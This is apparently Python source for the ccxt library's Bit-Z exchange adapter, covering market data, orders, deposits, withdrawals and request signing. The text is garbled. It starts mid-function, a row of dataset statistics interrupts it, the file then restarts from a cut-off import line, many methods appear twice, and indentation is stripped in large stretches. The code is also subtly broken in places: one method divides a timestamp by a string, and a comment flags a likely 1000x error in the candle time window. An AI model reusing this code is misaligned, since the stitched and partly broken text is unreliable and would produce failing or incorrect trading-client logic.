        """Fetch tickers for all (or the given) symbols from
        GET /Market/tickerall and return them keyed by unified symbol."""
        self.load_markets()
        request = {}
        if symbols is not None:
            ids = self.market_ids(symbols)
            request['symbols'] = ','.join(ids)
        response = self.marketGetTickerall(self.extend(request, params))
        #
        #     {    status:    200,
        #              msg:   "",
        #             data: {   ela_btc: {          symbol: "ela_btc",
        #                                      quoteVolume: "0.00",
        #                                           volume: "3.28",
        #                                      priceChange: "0.00",
        #                                   priceChange24h: "0.00",
        #                                         askPrice: "0.00147984",
        #                                           askQty: "5.4580",
        #                                         bidPrice: "0.00120230",
        #                                           bidQty: "12.5384",
        #                                             open: "0.00149078",
        #                                             high: "0.00149078",
        #                                              low: "0.00149078",
        #                                              now: "0.00149078",
        #                                          firstId:  115581219,
        #                                           lastId:  115581219,
        #                                        dealCount:  1,
        #                                  numberPrecision:  4,
        #                                   pricePrecision:  8,
        #                                              cny: "73.66",
        #                                              usd: "10.79",
        #                                              krw: "11995.03"    }     },
        #             time:    1535971578,
        #        microtime:   "0.39854200 1535971578",
        #           source:   "api"                                                }
        #
        tickers = self.safe_value(response, 'data')
        timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
        result = {}
        ids = list(tickers.keys())
        for i in range(0, len(ids)):
            id = ids[i]
            ticker = tickers[id]
            market = None
            if id in self.markets_by_id:
                market = self.markets_by_id[id]
            ticker = self.parse_ticker(tickers[id], market)
            symbol = ticker['symbol']
            # Reconstruct the symbol from the raw id when the market is unknown.
            if symbol is None:
                if market is not None:
                    symbol = market['symbol']
                else:
                    baseId, quoteId = id.split('_')
                    base = self.safe_currency_code(baseId)
                    quote = self.safe_currency_code(quoteId)
                    symbol = base + '/' + quote
            if symbol is not None:
                result[symbol] = self.extend(ticker, {
                    'timestamp': timestamp,
                    'datetime': self.iso8601(timestamp),
                })
        return self.filter_by_array(result, 'symbol', symbols)
def fetch_time(self, params={}):
response = self.marketGetGetServerTime(params)
#
# {
# "status":200,
# "msg":"",
# "data":[],
# "time":1555490875,
# "microtime":"0.35994200 1555490875",
# "source":"api"
# }
#
return self.safe_timestamp(response, 'time')
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
request = {
'symbol': self.market_id(symbol),
}
response = self.marketGetDepth(self.extend(request, params))
#
# { status: 200,
# msg: "",
# data: { asks: [["10.00000000", "0.4426", "4.4260"],
# ["1.00000000", "0.8339", "0.8339"],
# ["0.91700000", "0.0500", "0.0458"],
# ["0.20000000", "0.1000", "0.0200"],
# ["0.03987120", "16.1262", "0.6429"],
# ["0.03986120", "9.7523", "0.3887"] ],
# bids: [["0.03976145", "0.0359", "0.0014"],
# ["0.03973401", "20.9493", "0.8323"],
# ["0.03967970", "0.0328", "0.0013"],
# ["0.00000002", "10000.0000", "0.0002"],
# ["0.00000001", "231840.7500", "0.0023"]],
# coinPair: "eth_btc" },
# time: 1535974778,
# microtime: "0.04017400 1535974778",
# source: "api" }
#
orderbook = self.safe_value(response, 'data')
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
return self.parse_order_book(orderbook, timestamp)
def parse_trade(self, trade, market=None):
#
# fetchTrades(public)
#
# {id: 115807453,
# t: "19:36:24",
# T: 1535974584,
# p: "0.03983296",
# n: "0.1000",
# s: "buy" },
#
id = self.safe_string(trade, 'id')
timestamp = self.safe_timestamp(trade, 'T')
symbol = None
if market is not None:
symbol = market['symbol']
price = self.safe_float(trade, 'p')
amount = self.safe_float(trade, 'n')
cost = None
if price is not None:
if amount is not None:
cost = self.price_to_precision(symbol, amount * price)
side = self.safe_string(trade, 's')
return {
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'id': id,
'order': None,
'type': 'limit',
'side': side,
'takerOrMaker': None,
'price': price,
'amount': amount,
'cost': cost,
'fee': None,
'info': trade,
}
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = self.marketGetOrder(self.extend(request, params))
#
# { status: 200,
# msg: "",
# data: [{id: 115807453,
# t: "19:36:24",
# T: 1535974584,
# p: "0.03983296",
# n: "0.1000",
# s: "buy" },
# {id: 115806811,
# t: "19:33:19",
# T: 1535974399,
# p: "0.03981135",
# n: "9.4612",
# s: "sell" } ],
# time: 1535974583,
# microtime: "0.57118100 1535974583",
# source: "api" }
#
return self.parse_trades(response['data'], market, since, limit)
def parse_ohlcv(self, ohlcv, market=None):
#
# {
# time: "1535973420000",
# open: "0.03975084",
# high: "0.03975084",
# low: "0.03967700",
# close: "0.03967700",
# volume: "12.4733",
# datetime: "2018-09-03 19:17:00"
# }
#
return [
self.safe_integer(ohlcv, 'time'),
self.safe_float(ohlcv, 'open'),
self.safe_float(ohlcv, 'high'),
self.safe_float(ohlcv, 'low'),
self.safe_float(ohlcv, 'close'),
self.safe_float(ohlcv, 'volume'),
]
    def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
        """Fetch OHLCV candles from GET /Market/kline.

        Raises ArgumentsRequired when 'since' is given without 'limit',
        because the exchange window end ('to') is derived from both."""
        self.load_markets()
        duration = self.parse_timeframe(timeframe) * 1000  # timeframe in ms
        market = self.market(symbol)
        request = {
            'symbol': market['id'],
            'resolution': self.timeframes[timeframe],
        }
        if limit is not None:
            request['size'] = min(limit, 300)  # 1-300
            if since is not None:
                # NOTE(review): 'duration' is already milliseconds, and the
                # sample response shows 'to' in milliseconds, so the extra
                # * 1000 looks like it overshoots by 1000x — confirm against
                # the Bit-Z kline API before changing.
                request['to'] = self.sum(since, limit * duration * 1000)
        else:
            if since is not None:
                raise ArgumentsRequired(self.id + ' fetchOHLCV requires a limit argument if the since argument is specified')
        response = self.marketGetKline(self.extend(request, params))
        #
        #     {
        #         status: 200,
        #         msg: "",
        #         data: {
        #             bars: [
        #                 {time: "1535973420000", open: "0.03975084", high: "0.03975084", low: "0.03967700", close: "0.03967700", volume: "12.4733", datetime: "2018-09-03 19:17:00"},
        #                 {time: "1535955480000", open: "0.04009900", high: "0.04016745", low: "0.04009900", close: "0.04012074", volume: "74.4803", datetime: "2018-09-03 14:18:00"},
        #             ],
        #             resolution: "1min",
        #             symbol: "eth_btc",
        #             from: "1535973420000",
        #             to: "1535955480000",
        #             size: 300
        #         },
        #         time: 1535973435,
        #         microtime: "0.56462100 1535973435",
        #         source: "api"
        #     }
        #
        data = self.safe_value(response, 'data', {})
        bars = self.safe_value(data, 'bars', [])
        return self.parse_ohlcvs(bars, market, timeframe, since, limit)
def parse_order_status(self, status):
statuses = {
'0': 'open',
'1': 'open', # partially filled
'2': 'closed', # filled
'3': 'canceled',
}
return self.safe_string(statuses, status, status)
    def parse_order(self, order, market=None):
        """Convert an exchange order dict(from createOrder / fetchOrder /
        order-history endpoints) into the unified ccxt order structure."""
        #
        # createOrder
        #
        #     {
        #         "id": "693248739",   # order id
        #         "uId": "2074056",    # uid
        #         "price": "100",      # price
        #         "number": "10",      # number
        #         "numberOver": "10",  # undealed
        #         "flag": "sale",      # flag
        #         "status": "0",       # unfilled
        #         "coinFrom": "vtc",
        #         "coinTo": "dkkt",
        #         "numberDeal": "0"    # dealed
        #     }
        #
        id = self.safe_string(order, 'id')
        symbol = None
        # Resolve the market from coinFrom/coinTo when not supplied.
        if market is None:
            baseId = self.safe_string(order, 'coinFrom')
            quoteId = self.safe_string(order, 'coinTo')
            if (baseId is not None) and (quoteId is not None):
                marketId = baseId + '_' + quoteId
                if marketId in self.markets_by_id:
                    market = self.safe_value(self.markets_by_id, marketId)
                else:
                    base = self.safe_currency_code(baseId)
                    quote = self.safe_currency_code(quoteId)
                    symbol = base + '/' + quote
        if market is not None:
            symbol = market['symbol']
        side = self.safe_string(order, 'flag')
        # 'sale' means a sell order; everything else is treated as a buy.
        if side is not None:
            side = 'sell' if (side == 'sale') else 'buy'
        price = self.safe_float(order, 'price')
        amount = self.safe_float(order, 'number')
        remaining = self.safe_float(order, 'numberOver')
        filled = self.safe_float(order, 'numberDeal')
        timestamp = self.safe_integer(order, 'timestamp')
        # Fall back to the 'created' unix-seconds field when no ms timestamp.
        if timestamp is None:
            timestamp = self.safe_timestamp(order, 'created')
        cost = self.safe_float(order, 'orderTotalPrice')
        # Prefer a locally computed cost(filled * price) over the
        # exchange-reported total when both price and filled are known.
        if price is not None:
            if filled is not None:
                cost = filled * price
        status = self.parse_order_status(self.safe_string(order, 'status'))
        return {
            'id': id,
            'clientOrderId': None,
            'datetime': self.iso8601(timestamp),
            'timestamp': timestamp,
            'lastTradeTimestamp': None,
            'status': status,
            'symbol': symbol,
            'type': 'limit',
            'side': side,
            'price': price,
            'cost': cost,
            'amount': amount,
            'filled': filled,
            'remaining': remaining,
            'trades': None,
            'fee': None,
            'info': order,
            'average': None,
        }
    def create_order(self, symbol, type, side, amount, price=None, params={}):
        """Place a limit order via POST /Trade/addEntrustSheet.

        Only limit orders are supported, and exchange.password must hold
        the Bit-Z *trade* password(distinct from the login password)."""
        self.load_markets()
        if type != 'limit':
            raise ExchangeError(self.id + ' createOrder allows limit orders only')
        market = self.market(symbol)
        # The exchange encodes side numerically: 1 = buy, 2 = sell.
        orderType = '1' if (side == 'buy') else '2'
        if not self.password:
            raise ExchangeError(self.id + ' createOrder() requires you to set exchange.password = "YOUR_TRADING_PASSWORD"(a trade password is NOT THE SAME as your login password)')
        request = {
            'symbol': market['id'],
            'type': orderType,
            'price': self.price_to_precision(symbol, price),
            'number': self.amount_to_precision(symbol, amount),
            'tradePwd': self.password,
        }
        response = self.tradePostAddEntrustSheet(self.extend(request, params))
        #
        #     {
        #         "status": 200,
        #         "msg": "",
        #         "data": {
        #             "id": "693248739",   # order id
        #             "uId": "2074056",    # uid
        #             "price": "100",      # price
        #             "number": "10",      # number
        #             "numberOver": "10",  # undealed
        #             "flag": "sale",      # flag
        #             "status": "0",       # unfilled
        #             "coinFrom": "vtc",
        #             "coinTo": "dkkt",
        #             "numberDeal": "0"    # dealed
        #         },
        #         "time": "1533035297",
        #         "microtime": "0.41892000 1533035297",
        #         "source": "api",
        #     }
        #
        timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
        order = self.extend({
            'timestamp': timestamp,
        }, response['data'])
        return self.parse_order(order, market)
def cancel_order(self, id, symbol=None, params={}):
self.load_markets()
request = {
'entrustSheetId': id,
}
response = self.tradePostCancelEntrustSheet(self.extend(request, params))
#
# {
# "status":200,
# "msg":"",
# "data":{
# "updateAssetsData":{
# "coin":"bz",
# "over":"1000.00000000",
# "lock":"-1000.00000000"
# },
# "assetsInfo":{
# "coin":"bz",
# "over":"9999.99999999",
# "lock":"9999.99999999"
# }
# },
# "time":"1535464383",
# "microtime":"0.91558000 1535464383",
# "source":"api"
# }
#
return response
def cancel_orders(self, ids, symbol=None, params={}):
self.load_markets()
request = {
'ids': ','.join(ids),
}
response = self.tradePostCancelEntrustSheet(self.extend(request, params))
#
# {
# "status":200,
# "msg":"",
# "data":{
# "744173808":{
# "updateAssetsData":{
# "coin":"bz",
# "over":"100.00000000",
# "lock":"-100.00000000"
# },
# "assetsInfo":{
# "coin":"bz",
# "over":"899.99999999",
# "lock":"19099.99999999"
# }
# },
# "744173809":{
# "updateAssetsData":{
# "coin":"bz",
# "over":"100.00000000",
# "lock":"-100.00000000"
# },
# "assetsInfo":{
# "coin":"bz",
# "over":"999.99999999",
# "lock":"18999.99999999"
# }
# }
# },
# "time":"1535525649",
# "microtime":"0.05009400 1535525649",
# "source":"api"
# }
#
return response
def fetch_order(self, id, symbol=None, params={}):
self.load_markets()
request = {
'entrustSheetId': id,
}
response = self.tradePostGetEntrustSheetInfo(self.extend(request, params))
#
# {
# "status":200,
# "msg":"",
# "data":{
# "id":"708279852",
# "uId":"2074056",
# "price":"100.00000000",
# "number":"10.0000",
# "total":"0.00000000",
# "numberOver":"10.0000",
# "numberDeal":"0.0000",
# "flag":"sale",
# "status":"0", #0:unfilled, 1:partial deal, 2:all transactions, 3:already cancelled
# "coinFrom":"bz",
# "coinTo":"usdt",
# "orderTotalPrice":"0",
# "created":"1533279876"
# },
# "time":"1533280294",
# "microtime":"0.36859200 1533280294",
# "source":"api"
# }
#
return self.parse_order(response['data'])
def fetch_orders_with_method(self, method, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOpenOrders requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'coinFrom': market['baseId'],
'coinTo': market['quoteId'],
# 'type': 1, # optional integer, 1 = buy, 2 = sell
# 'page': 1, # optional integer
# 'pageSize': 100, # optional integer, max 100
# 'startTime': 1510235730, # optional integer timestamp in seconds
# 'endTime': 1510235730, # optional integer timestamp in seconds
}
if limit is not None:
request['page'] = 1
request['pageSize'] = limit
if since is not None:
request['startTime'] = int(since / 1000)
# request['endTime'] = int(since / 1000)
response = getattr(self, method)(self.extend(request, params))
#
# {
# "status": 200,
# "msg": "",
# "data": {
# "data": [
# {
# "id": "693248739",
# "uid": "2074056",
# "price": "100.00000000",
# "number": "10.0000",
# "total": "0.00000000",
# "numberOver": "0.0000",
# "numberDeal": "0.0000",
# "flag": "sale",
# "status": "3", # 0:unfilled, 1:partial deal, 2:all transactions, 3:already cancelled
# "isNew": "N",
# "coinFrom": "vtc",
# "coinTo": "dkkt",
# "created": "1533035300",
# },
# {
# "id": "723086996",
# "uid": "2074056",
# "price": "100.00000000",
# "number": "10.0000",
# "total": "0.00000000",
# "numberOver": "0.0000",
# "numberDeal": "0.0000",
# "flag": "sale",
# "status": "3",
# "isNew": "N",
# "coinFrom": "bz",
# "coinTo": "usdt",
# "created": "1533523568",
# },
# ],
# "pageInfo": {
# "limit": "10",
# "offest": "0",
# "current_page": "1",
# "page_size": "10",
# "total_count": "17",
# "page_count": "2",
# }
# },
# "time": "1533279329",
# "microtime": "0.15305300 1533279329",
# "source": "api"
# }
#
orders = self.safe_value(response['data'], 'data', [])
return self.parse_orders(orders, None, since, limit)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
return self.fetch_orders_with_method('tradePostGetUserHistoryEntrustSheet', symbol, since, limit, params)
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
return self.fetch_orders_with_method('tradePostGetUserNowEntrustSheet', symbol, since, limit, params)
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
return self.fetch_orders_with_method('tradePostGetUserHistoryEntrustSheet', symbol, since, limit, params)
def parse_transaction_status(self, status):
statuses = {
'1': 'pending',
'2': 'pending',
'3': 'pending',
'4': 'ok',
'5': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_transaction(self, transaction, currency=None):
#
# {
# "id": '96275',
# "uid": '2109073',
# "wallet": '0xf4c4141c0127bc37b1d0c409a091920eba13ada7',
# "txid": '0xb7adfa52aa566f9ac112e3c01f77bd91179b19eab12092a9a5a8b33d5086e31d',
# "confirm": '12',
# "number": '0.50000000',
# "status": 4,
# "updated": '1534944168605',
# "addressUrl": 'https://etherscan.io/address/',
# "txidUrl": 'https://etherscan.io/tx/',
# "description": 'Ethereum',
# "coin": 'eth',
# "memo": ''
# }
#
# {
# "id":"397574",
# "uid":"2033056",
# "wallet":"1AG1gZvQAYu3WBvgg7p4BMMghQD2gE693k",
# "txid":"",
# "confirm":"0",
# "number":"1000.00000000",
# "status":1,
# "updated":"0",
# "addressUrl":"http://omniexplorer.info/lookupadd.aspx?address=",
# "txidUrl":"http://omniexplorer.info/lookuptx.aspx?txid=",
# "description":"Tether",
# "coin":"usdt",
# "memo":""
# }
#
# {
# "id":"153606",
# "uid":"2033056",
# "wallet":"1AG1gZvQAYu3WBvgg7p4BMMghQD2gE693k",
# "txid":"aa2b179f84cd6dedafd41845e0fbf7f01e14c0d71ea3140d03d6f5a9ccd93199",
# "confirm":"0",
# "number":"761.11110000",
# "status":4,
# "updated":"1536726133579",
# "addressUrl":"http://omniexplorer.info/lookupadd.aspx?address=",
# "txidUrl":"http://omniexplorer.info/lookuptx.aspx?txid=",
# "description":"Tether",
# "coin":"usdt",
# "memo":""
# }
#
# withdraw
#
# {
# "id":397574,
# "email":"***@email.com",
# "coin":"usdt",
# "network_fee":"",
# "eid":23112
# }
#
timestamp = self.safe_integer(transaction, 'updated')
if timestamp == 0:
timestamp = None
currencyId = self.safe_string(transaction, 'coin')
code = self.safe_currency_code(currencyId, currency)
type = self.safe_string_lower(transaction, 'type')
status = self.parse_transaction_status(self.safe_string(transaction, 'status'))
fee = None
feeCost = self.safe_float(transaction, 'network_fee')
if feeCost is not None:
fee = {
'cost': feeCost,
'code': code,
}
return {
'id': self.safe_string(transaction, 'id'),
'txid': self.safe_string(transaction, 'txid'),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'address': self.safe_string(transaction, 'wallet'),
'tag': self.safe_string(transaction, 'memo'),
'type': type,
'amount': self.safe_float(transaction, 'number'),
'currency': code,
'status': status,
'updated': timestamp,
'fee': fee,
'info': transaction,
}
def parse_transactions_by_type(self, type, transactions, code=None, since=None, limit=None):
result = []
for i in range(0, len(transactions)):
transaction = self.parse_transaction(self.extend({
'type': type,
}, transactions[i]))
result.append(transaction)
return self.filter_by_currency_since_limit(result, code, since, limit)
def parse_transaction_type(self, type):
types = {
'deposit': 1,
'withdrawal': 2,
}
return self.safe_integer(types, type, type)
def fetch_deposits(self, code=None, since=None, limit=None, params={}):
return self.fetch_transactions_for_type('deposit', code, since, limit, params)
def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
return self.fetch_transactions_for_type('withdrawal', code, since, limit, params)
def fetch_transactions_for_type(self, type, code=None, since=None, limit=None, params={}):
if code is None:
raise ArgumentsRequired(self.id + ' fetchTransactions() requires a currency `code` argument')
self.load_markets()
currency = self.currency(code)
request = {
'coin': currency['id'],
'type': self.parse_transaction_type(type),
}
if since is not None:
request['startTime'] = int(since / str(1000))
if limit is not None:
request['page'] = 1
request['pageSize'] = limit
response = self.tradePostDepositOrWithdraw(self.extend(request, params))
transactions = self.safe_value(response['data'], 'data', [])
return self.parse_transactions_by_type(type, transactions, code, since, limit)
def withdraw(self, code, amount, address, tag=None, params={}):
self.check_address(address)
self.load_markets()
currency = self.currency(code)
request = {
'coin': currency['id'],
'number': self.currency_to_precision(code, amount),
'address': address,
# 'type': 'erc20', # omni, trc20, optional
}
if tag is not None:
request['memo'] = tag
response = self.tradePostCoinOut(self.extend(request, params))
#
# {
# "status":200,
# "msg":"",
# "data":{
# "id":397574,
# "email":"***@email.com",
# "coin":"usdt",
# "network_fee":"",
# "eid":23112
# },
# "time":1552641646,
# "microtime":"0.70304500 1552641646",
# "source":"api"
# }
#
data = self.safe_value(response, 'data', {})
return self.parse_transaction(data, currency)
def nonce(self):
currentTimestamp = self.seconds()
if currentTimestamp > self.options['lastNonceTimestamp']:
self.options['lastNonceTimestamp'] = currentTimestamp
self.options['lastNonce'] = 100000
self.options['lastNonce'] = self.sum(self.options['lastNonce'], 1)
return self.options['lastNonce']
def sign(self, path, api='market', method='GET', params={}, headers=None, body=None):
baseUrl = self.implode_params(self.urls['api'][api], {'hostname': self.hostname})
url = baseUrl + '/' + self.capitalize(api) + '/' + path
query = None
if api == 'market':
query = self.urlencode(params)
if len(query):
url += '?' + query
else:
self.check_required_credentials()
body = self.rawencode(self.keysort(self.extend({
'apiKey': self.apiKey,
'timeStamp': self.seconds(),
'nonce': self.nonce(),
}, params)))
body += '&sign=' + self.hash(self.encode(body + self.secret))
headers = {'Content-type': 'application/x-www-form-urlencoded'}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, httpCode, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return # fallback to default error handler
status = self.safe_string(response, 'status')
if status is not None:
feedback = self.id + ' ' + body
#
# {"status":-107,"msg":"","data":"","time":1535968848,"microtime":"0.89092200 1535968848","source":"api"}
#
if status == '200':
#
# {"status":200,"msg":"","data":-200031,"time":1535999806,"microtime":"0.85476800 1535999806","source":"api"}
#
code = self.safe_integer(response, 'data')
if code is not None:
self.throw_exactly_matched_exception(self.exceptions, code, feedback)
raise ExchangeError(feedback)
else:
return # no error
self.throw_exactly_matched_exception(self.exceptions, status, feedback)
raise ExchangeError(feedback)
| 41.424466 | 182 | 0.414012 |
ge import Exchange
import math
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import DDoSProtection
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.errors import OnMaintenance
class bitz(Exchange):
def describe(self):
return self.deep_extend(super(bitz, self).describe(), {
'id': 'bitz',
'name': 'Bit-Z',
'countries': ['HK'],
'rateLimit': 2000,
'version': 'v2',
'userAgent': self.userAgents['chrome'],
'has': {
'cancelOrder': True,
'cancelOrders': True,
'createOrder': True,
'createMarketOrder': False,
'fetchBalance': True,
'fetchDeposits': True,
'fetchClosedOrders': True,
'fetchMarkets': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchOrders': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTime': True,
'fetchTrades': True,
'fetchTransactions': False,
'fetchWithdrawals': True,
'withdraw': True,
},
'timeframes': {
'1m': '1min',
'5m': '5min',
'15m': '15min',
'30m': '30min',
'1h': '60min',
'4h': '4hour',
'1d': '1day',
'5d': '5day',
'1w': '1week',
'1M': '1mon',
},
'hostname': 'apiv2.bitz.com',
'urls': {
'logo': 'https://user-images.githubusercontent.com/51840849/87443304-fec5e000-c5fd-11ea-98f8-ba8e67f7eaff.jpg',
'api': {
'market': 'https://{hostname}',
'trade': 'https://{hostname}',
'assets': 'https://{hostname}',
},
'www': 'https://www.bitz.com',
'doc': 'https://apidoc.bitz.com/en/',
'fees': 'https://www.bitz.com/fee?type=1',
'referral': 'https://u.bitz.com/register?invite_code=1429193',
},
'api': {
'market': {
'get': [
'ticker',
'depth',
'order',
'tickerall',
'kline',
'symbolList',
'getServerTime',
'currencyRate',
'currencyCoinRate',
'coinRate',
],
},
'trade': {
'post': [
'addEntrustSheet',
'cancelEntrustSheet',
'cancelAllEntrustSheet',
'coinOut',
'getUserHistoryEntrustSheet',
'getUserNowEntrustSheet',
'getEntrustSheetInfo',
'depositOrWithdraw',
],
},
'assets': {
'post': [
'getUserAssets',
],
},
},
'fees': {
'trading': {
'maker': 0.002,
'taker': 0.002,
},
'funding': {
'withdraw': {
'BTC': '0.5%',
'DKKT': '0.5%',
'ETH': 0.01,
'USDT': '0.5%',
'LTC': '0.5%',
'FCT': '0.5%',
'LSK': '0.5%',
'HXI': '0.8%',
'ZEC': '0.5%',
'DOGE': '0.5%',
'MZC': '0.5%',
'ETC': '0.5%',
'GXS': '0.5%',
'XPM': '0.5%',
'PPC': '0.5%',
'BLK': '0.5%',
'XAS': '0.5%',
'HSR': '0.5%',
'NULS': 5.0,
'VOISE': 350.0,
'PAY': 1.5,
'EOS': 0.6,
'YBCT': 35.0,
'OMG': 0.3,
'OTN': 0.4,
'BTX': '0.5%',
'QTUM': '0.5%',
'DASH': '0.5%',
'GAME': '0.5%',
'BCH': '0.5%',
'GNT': 9.0,
'SSS': 1500.0,
'ARK': '0.5%',
'PART': '0.5%',
'LEO': '0.5%',
'DGB': '0.5%',
'ZSC': 130.0,
'VIU': 350.0,
'BTG': '0.5%',
'ARN': 10.0,
'VTC': '0.5%',
'BCD': '0.5%',
'TRX': 200.0,
'HWC': '0.5%',
'UNIT': '0.5%',
'OXY': '0.5%',
'MCO': 0.3500,
'SBTC': '0.5%',
'BCX': '0.5%',
'ETF': '0.5%',
'PYLNT': 0.4000,
'XRB': '0.5%',
'ETP': '0.5%',
},
},
},
'precision': {
'amount': 8,
'price': 8,
},
'options': {
'fetchOHLCVVolume': True,
'fetchOHLCVWarning': True,
'lastNonceTimestamp': 0,
},
'commonCurrencies': {
'BOX': 'BOX Token',
'LEO': 'LeoCoin',
'XRB': 'NANO',
'PXC': 'Pixiecoin',
'VTC': 'VoteCoin',
'TTC': 'TimesChain',
},
'exceptions': {
'-102': ExchangeError,
'-103': AuthenticationError,
'-104': ExchangeNotAvailable,
'-105': AuthenticationError,
'-106': ExchangeNotAvailable,
'-109': AuthenticationError,
'-110': DDoSProtection,
'-111': PermissionDenied,
'-112': OnMaintenance,
'-114': RateLimitExceeded,
'-117': AuthenticationError,
'-100015': AuthenticationError,
'-100044': ExchangeError,
'-100101': ExchangeError,
'-100201': ExchangeError,
'-100301': ExchangeError,
'-100401': ExchangeError,
'-100302': ExchangeError,
'-100303': ExchangeError,
'-200003': AuthenticationError,
'-200005': PermissionDenied,
'-200025': ExchangeNotAvailable,
'-200027': InvalidOrder,
'-200028': InvalidOrder,
'-200029': InvalidOrder,
'-200030': InvalidOrder,
'-200031': InsufficientFunds,
'-200032': ExchangeError,
'-200033': ExchangeError,
'-200034': OrderNotFound,
'-200035': OrderNotFound,
'-200037': InvalidOrder,
'-200038': ExchangeError,
'-200055': OrderNotFound,
'-300069': AuthenticationError,
'-300101': ExchangeError,
'-300102': InvalidOrder,
'-300103': AuthenticationError,
'-301001': ExchangeNotAvailable,
},
})
def fetch_markets(self, params={}):
response = self.marketGetSymbolList(params)
markets = self.safe_value(response, 'data')
ids = list(markets.keys())
result = []
for i in range(0, len(ids)):
id = ids[i]
market = markets[id]
numericId = self.safe_string(market, 'id')
baseId = self.safe_string(market, 'coinFrom')
quoteId = self.safe_string(market, 'coinTo')
base = baseId.upper()
quote = quoteId.upper()
base = self.safe_currency_code(base)
quote = self.safe_currency_code(quote)
symbol = base + '/' + quote
precision = {
'amount': self.safe_integer(market, 'numberFloat'),
'price': self.safe_integer(market, 'priceFloat'),
}
result.append({
'info': market,
'id': id,
'numericId': numericId,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'active': True,
'precision': precision,
'limits': {
'amount': {
'min': self.safe_float(market, 'minTrade'),
'max': self.safe_float(market, 'maxTrade'),
},
'price': {
'min': math.pow(10, -precision['price']),
'max': None,
},
'cost': {
'min': None,
'max': None,
},
},
})
return result
def fetch_balance(self, params={}):
self.load_markets()
response = self.assetsPostGetUserAssets(params)
balances = self.safe_value(response['data'], 'info')
result = {'info': response}
for i in range(0, len(balances)):
balance = balances[i]
currencyId = self.safe_string(balance, 'name')
code = self.safe_currency_code(currencyId)
account = self.account()
account['used'] = self.safe_float(balance, 'lock')
account['total'] = self.safe_float(balance, 'num')
account['free'] = self.safe_float(balance, 'over')
result[code] = account
return self.parse_balance(result)
def parse_ticker(self, ticker, market=None):
timestamp = None
marketId = self.safe_string(ticker, 'symbol')
symbol = self.safe_symbol(marketId, market, '_')
last = self.safe_float(ticker, 'now')
open = self.safe_float(ticker, 'open')
change = None
average = None
if last is not None and open is not None:
change = last - open
average = self.sum(last, open) / 2
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_float(ticker, 'high'),
'low': self.safe_float(ticker, 'low'),
'bid': self.safe_float(ticker, 'bidPrice'),
'bidVolume': self.safe_float(ticker, 'bidQty'),
'ask': self.safe_float(ticker, 'askPrice'),
'askVolume': self.safe_float(ticker, 'askQty'),
'vwap': None,
'open': open,
'close': last,
'last': last,
'previousClose': None,
'change': change,
'percentage': self.safe_float(ticker, 'priceChange24h'),
'average': average,
'baseVolume': self.safe_float(ticker, 'volume'),
'quoteVolume': self.safe_float(ticker, 'quoteVolume'),
'info': ticker,
}
def parse_microtime(self, microtime):
if microtime is None:
return microtime
parts = microtime.split(' ')
milliseconds = float(parts[0])
seconds = int(parts[1])
total = self.sum(seconds, milliseconds)
return int(total * 1000)
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = self.marketGetTicker(self.extend(request, params))
ticker = self.parse_ticker(response['data'], market)
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
return self.extend(ticker, {
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
})
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
request = {}
if symbols is not None:
ids = self.market_ids(symbols)
request['symbols'] = ','.join(ids)
response = self.marketGetTickerall(self.extend(request, params))
tickers = self.safe_value(response, 'data')
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
result = {}
ids = list(tickers.keys())
for i in range(0, len(ids)):
id = ids[i]
ticker = tickers[id]
market = None
if id in self.markets_by_id:
market = self.markets_by_id[id]
ticker = self.parse_ticker(tickers[id], market)
symbol = ticker['symbol']
if symbol is None:
if market is not None:
symbol = market['symbol']
else:
baseId, quoteId = id.split('_')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
if symbol is not None:
result[symbol] = self.extend(ticker, {
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
})
return self.filter_by_array(result, 'symbol', symbols)
def fetch_time(self, params={}):
response = self.marketGetGetServerTime(params)
return self.safe_timestamp(response, 'time')
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
request = {
'symbol': self.market_id(symbol),
}
response = self.marketGetDepth(self.extend(request, params))
orderbook = self.safe_value(response, 'data')
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
return self.parse_order_book(orderbook, timestamp)
def parse_trade(self, trade, market=None):
id = self.safe_string(trade, 'id')
timestamp = self.safe_timestamp(trade, 'T')
symbol = None
if market is not None:
symbol = market['symbol']
price = self.safe_float(trade, 'p')
amount = self.safe_float(trade, 'n')
cost = None
if price is not None:
if amount is not None:
cost = self.price_to_precision(symbol, amount * price)
